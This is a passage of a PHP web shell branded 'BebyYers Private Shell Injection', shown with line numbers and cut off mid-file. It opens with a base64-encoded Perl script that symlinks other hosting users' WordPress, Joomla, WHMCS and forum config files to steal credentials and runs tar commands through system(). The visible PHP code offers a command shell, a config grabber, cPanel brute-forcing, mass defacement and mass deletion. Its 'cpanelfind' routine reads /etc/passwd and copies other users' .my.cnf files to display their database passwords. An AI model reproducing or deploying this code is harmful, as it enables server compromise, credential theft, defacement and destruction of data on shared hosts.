dXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
562?>
563<html>
564<head>
565<title>BebyYers Private Shell Injection ----</title>
566<script type="text/javascript">
567function tukar(lama,baru){
568 document.getElementById(lama).style.display = 'none';
569 document.getElementById(baru).style.display = 'block';
570}
571</script>
572<link href='http://fonts.googleapis.com/css?family=Cherry+Cream+Soda' rel='stylesheet' type='text/css'>
573
574<style type="text/css">
575body{
576 background: #000000;
577 font-family: Cherry Cream Soda ;
578}
579a {
580text-decoration:none;
581}
582a:hover{
583border-bottom:0px solid #E74C3D ;
584}
585*{
586 font-size:11px;
587 font-family: Cherry Cream Soda ;
588 color:white;
589}
590#menu{
591 background:#000000;
592 margin:8px 2px 4px 2px;
593}
594#menu a{
595 padding:2px 7px;
596 margin:0;
597 background: #595959 ;
598 border-bottom: 3px solid #E74C3D;
599 text-decoration:none;
600 letter-spacing:2px;
601 -moz-border-radius: 3px; -webkit-border-radius: 3px; -khtml-border-radius: 3px; border-radius: 3px;
602
603}
604#menu a:hover{
605 background: #404040 ;
606 border-bottom: 3px solid #E74C3D;
607}
608.tabnet{
609 margin:15px auto 0 auto;
610 border: 1px solid #E74C3D ;
611}
612.main {
613 width:100%;
614}
615.gaya {
616 color: white;
617}
618.inputz{
619 background:#111111;
620 border:0;
621 padding:2px;
622 border-bottom:1px solid #E74C3D ;
623 border-top:1px solid #E74C3D ;
624}
625.inputzbut{
626 background: #595959 ;
627 color:white;
628 margin:0 4px;
629 border-bottom:3px solid #E74C3D ;
630
631}
632.inputz:hover
633 border-bottom:1px solid #E74C3D ;
634 border-top:1px solid #E74C3D ;
635
636}
637.inputzbut:hover{
638 border-bottom:1px solid #E74C3D ;
639 border-top:1px solid #E74C3D ;
640}
641.output {
642 margin:auto;
643 border:1px solid #E74C3D ;
644 width:100%;
645 height:400px;
646 background:#b5abab;
647 padding:0 2px;
648}
649.cmdbox{
650 width:100%;
651}
652.head_info{
653 padding: 0 4px;
654}
655.jaya{ font-family: Cherry Cream Soda ; }
656
657.kerupuk{
658 font-size:50px;
659 padding:0;
660 color:red;
661}
662.kerupuk_1{
663 text-align:center;
664 margin:0 4px 0 0;
665 padding:0 4px 0 0;
666 border-right:1px solid #E74C3D ;
667}
668.phpinfo table{
669 width:100%;
670 padding:0 0 0 0;
671}
672.phpinfo td{
673 background:#111111;
674 color:#cccccc;
675padding:6px 8px;;
676}
677.phpinfo th, th{
678 background:#191919;
679 border-bottom:1px solid #E74C3D ;
680font-weight:normal;
681}
682.phpinfo h2, .phpinfo h2 a{
683 text-align:center;
684 font-size:16px;
685 padding:0;
686 margin:30px 0 0 0;
687 background:aqua;
688 padding:4px 0;
689}
690.explore{
691width:100%;
692}
693.explore a {
694text-decoration:none;
695}
696.explore td{
697border-bottom:1px solid #333333;
698padding:0 8px;
699line-height:24px;
700}
701.explore th{
702padding:3px 8px;
703font-weight:normal;
704}
705.explore th:hover , .phpinfo th:hover{
706border-bottom:1px solid #E74C3D ;
707}
708.explore tr:hover{
709background:grey;
710}
711.viewfile{
712background:white;
713color:#000000;
714margin:4px 2px;
715padding:8px;
716text-align:left;
717}
718.sembunyi{
719display:none;
720padding:0;margin:0;
721}
722</style></head>
723<body onLoad="document.getElementById('cmd').focus();">
724<!-- head info start here -->
725<div class="main">
726<hr color=black width=100%>
727</div>
728<center>
729<td><?php echo $buff; ?></td>
730<hr color=black width=100%>
731
732
733
734<!-- head info end here -->
735<!-- menu start -->
736<div id="menu">
737<a href="?<?php echo "y=".$pwd; ?>">Explore</a>
738<a href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a>
739<a href="?<?php echo "y=".$pwd; ?>&x=mysql">Mysql</a>
740<a href="?<?php echo "y=".$pwd; ?>&do=jumping">Jumping</a>
741<a href="?<?php echo "y=".$pwd; ?>&do=grabber">Config Grabber</a>
742<a href="?<?php echo "y=".$pwd; ?>&x=sec">Symlink Server</a>
743<a href="?<?php echo "y=".$pwd; ?>&x=sf">Symlink File</a>
744<a href="?<?php echo "y=".$pwd; ?>&x=dv">Domain Viewer</a>
745<a href="?<?php echo "y=".$pwd; ?>&x=wp">Wordpress Reset</a>
746<br><br>
747<a href="?<?php echo "y=".$pwd; ?>&x=jm">Joomla Reset</a>
748<a href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a>
749<a href="?<?php echo "y=".$pwd; ?>&x=mass">Mass Deface</a>
750<a href="?<?php echo "y=".$pwd; ?>&x=hash">Hash</a>
751<a href="?<?php echo "y=".$pwd; ?>&x=hashid">Hash ID</a>
752<a href="?<?php echo "y=".$pwd; ?>&x=db">DB Manag</a>
753<a href="?<?php echo "y=".$pwd; ?>&x=brute">Cpanel Brute</a>
754<a href="?<?php echo "y=".$pwd; ?>&x=cpanelfind">Cpanel Finder</a>
755<a href="?<?php echo "y=".$pwd; ?>&x=cpanel2">Cpanel Crack</a>
756 <br><br>
757<a href="?<?php echo "y=".$pwd; ?>&move=on">Mass Delete</a>
758<a href="?<?php echo "y=".$pwd; ?>&x=logout">Logout</a>
759
760</div>
761<!-- menu end -->
762
763<?php
764@ini_set('display_errors', 0);
765if(isset($_GET['x']) && ($_GET['x'] == 'cpanelfind')){
766
767@ini_set('display_errors',0);
768function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
769 $ar0=explode($marqueurDebutLien, $text);
770 $ar1=explode($marqueurFinLien, $ar0[$i]);
771 return trim($ar1[0]);
772}
773
774echo '<br><br>';
775
776echo "<center>";
777$d0mains = @file('/etc/named.conf');
778$domains = scandir("/var/named");
779
780if ($domains or $d0mains)
781{
782 $domains = scandir("/var/named");
783 if($domains) {
784echo '<table class="explore" width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:grey;color:white;text-align:center"> Count </th><th style="background:grey;color:white;text-align:center"> Domain </th><th style="background:grey;color:white;text-align:center"> User </th><th style="background:grey;color:white;text-align:center"> Password </th><th style="background:grey;color:white;text-align:center"> .my.cnf </th></tr>';
785$count=1;
786$dc = 0;
787$list = scandir("/var/named");
788foreach($list as $domain){
789if(strpos($domain,".db")){
790$domain = str_replace('.db',',$domain);
791$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
792$dirz = '/home/'.$owner['name'].'/.my.cnf';
793$path = getcwd();
794
795if (is_readable($dirz)) {
796copy($dirz, '.$path.'/'.$owner['name'].'.txt');
797$p=file_get_contents('.$path.'/'.$owner['name'].'.txt');
798$password=entre2v2($p,'password="','"');
799echo "<tr><td style='text-align:center'>".$count++."</td><td style='border-left:1px solid white;text-align:center'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;text-align:center'>".$owner['name']."</td><td style=border-left:1px solid white;text-align:center>".$password."</td><td style='border-left:1px solid white;text-align:center'><a href='".$owner['name'].".txt' target='_blank'>Check Here</a></td></tr>";
800$dc++;
801}
802
803}
804}
805echo '</table>';
806$total = $dc;
807echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
808echo '</center>';
809}else{
810$d0mains = @file('/etc/named.conf');
811 if($d0mains) {
812echo '<table class="explore" width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:grey;color:white;text-align:center"> Count </th><th style="background:grey;color:white;text-align:center"> Domain </th><th style="background:grey;color:white;text-align:center"> User </th><th style="background:grey;color:white;text-align:center"> Password </th><th style="background:grey;color:white;text-align:center"> .my.cnf </th></tr>';
813$count=1;
814$dc = 0;
815$mck = array();
816foreach($d0mains as $d0main){
817 if(@eregi('zone',$d0main)){
818 preg_match_all('#zone "(.*)"#',$d0main,$domain);
819 flush();
820 if(strlen(trim($domain[1][0])) >2){
821 $mck[] = $domain[1][0];
822 }
823 }
824}
825$mck = array_unique($mck);
826$usr = array();
827$dmn = array();
828foreach($mck as $o) {
829 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
830 $usr[] = $infos['name'];
831 $dmn[] = $o;
832}
833array_multisort($usr,$dmn);
834$dt = file('/etc/passwd');
835$passwd = array();
836foreach($dt as $d) {
837 $r = explode(':',$d);
838 if(strpos($r[5],'home')) {
839 $passwd[$r[0]] = $r[5];
840 }
841}
842$l=0;
843$j=1;
844foreach($usr as $r) {
845$dirz = '/home/'.$r.'/.my.cnf';
846$path = getcwd();
847if (is_readable($dirz)) {
848copy($dirz, '.$path.'/'.$r.'.txt');
849$p=file_get_contents('.$path.'/'.$r.'.txt');
850$password=entre2v2($p,'password="','"');
851echo "<tr><td style='text-align:center'>".$count++."</td><td style='border-left:1px solid white;text-align:center'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;text-align:center>'.$r."</td><td style=border-left:1px solid white;text-align:center>".$password."</td><td style=border-left:1px solid white;text-align:center><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
852$dc++;
853 flush();
854 $l=$l?0:1;
855 $j++;
856 }
857 }
858 }
859echo '</table>';
860$total = $dc;
861echo '<br><font color="green">Total cPanel Found = '.$total.'</font>';
862echo '</center>';
863
864}
865}else{
866echo "<i><font color='green'>ERROR -_-<br>/var/named or etc/named.conf Not Accessible! </font> </i>";
867}
868
869?>
870
871
872
873<?php }
874
875elseif(isset($_GET['view']) && ($_GET['view'] != "")){
876 if(is_file($_GET['view'])){
877 if(!isset($file)) $file = magicboom($_GET['view']);
878 if(!$win && $posix){
879 $name=@posix_getpwuid(@fileowner($folder));
880 $group=@posix_getgrgid(@filegroup($folder));
881 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
882 }
883 else {
884 $owner = $user;
885 }
886 $filn = basename($file);
887 echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
888 <tr><td>Name</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
889 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
890 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
891 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
892 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
893 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
894 </form>
895 </td></tr>
896 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
897 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
